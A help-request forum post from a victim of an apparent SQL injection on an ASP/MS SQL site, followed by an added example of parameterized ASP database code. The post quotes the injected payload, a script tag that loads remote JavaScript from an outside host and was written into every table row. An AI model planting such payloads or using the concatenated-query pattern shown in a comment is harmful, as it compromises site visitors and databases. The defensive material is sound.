Hello,
I have fallen victim to an SQL injection attack (or what seems to be) and have had three Tables in a database corrupted with a script string reading <script src=http://www.banner82.com/b.js></script> and placing itself in every row and as many columns as it can.
I believe it may be caused by poor coding on my part (i.e. not using parameterized coding in my SQL statements) but what I cannot figure out is how it manages to carry on. I have done the following preventive measures:
1) Restored old Table in a new Table under a different name
2) Renamed every column in the new table
But before I have even managed to get around to changing the ASP code on my website to reflect these changes the data in the new table is getting corrupted!!
Only three Tables (out of many more) are affected but these are the three tables normally executed when a user is on my website - however the new table with the restored data has not been executed through my website yet at all! As far as any web user is concerned it doesn't even exist (I only just created the damn thing).
Can anyone give me a clue as to how it does it and how it manages to do it with such lightning speed???
No point restoring a DB if I can't stop it from corrupting itself the very next minute...
I use MS SQL 2005 on a Windows Server 2003 - my coding language is ASP.
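
An added example, not part of the original post: the parameterized form the poster refers to, written for classic ASP with ADODB.Command, with the concatenated form it replaces shown as a comment. The connection string, the Products table and its column names are hypothetical.

```vbscript
<%
Option Explicit
' Hypothetical names throughout: connStr, the Products table and its columns.
Const adCmdText = 1, adParamInput = 1, adInteger = 3

Dim connStr, conn, cmd, rs, rawId
connStr = "Provider=SQLOLEDB;Data Source=(local);Initial Catalog=Shop;Integrated Security=SSPI;"
rawId = Request.QueryString("id")

' Vulnerable pattern (string concatenation): whatever follows ?id= becomes part
' of the T-SQL batch and runs with the rights of the site's database login.
'   sql = "SELECT Name, Price FROM Products WHERE ProductID = " & rawId
'   Set rs = conn.Execute(sql)

' Reject anything that is not a short numeric value before touching the database.
If Not IsNumeric(rawId) Or Len(rawId) > 9 Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open connStr

' Parameterized form: the value is sent as a typed integer parameter and is
' never parsed as SQL text.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT Name, Price FROM Products WHERE ProductID = ?"
cmd.Parameters.Append cmd.CreateParameter("@id", adInteger, adParamInput, , CLng(rawId))

Set rs = cmd.Execute
If Not rs.EOF Then
    ' Encode on output so markup stored in a column is displayed, not executed.
    Response.Write Server.HTMLEncode(rs("Name") & "")
End If
rs.Close
conn.Close
%>
```

Every page that builds SQL from Request values needs the same treatment; one remaining concatenated query is enough to keep the database writable through the site.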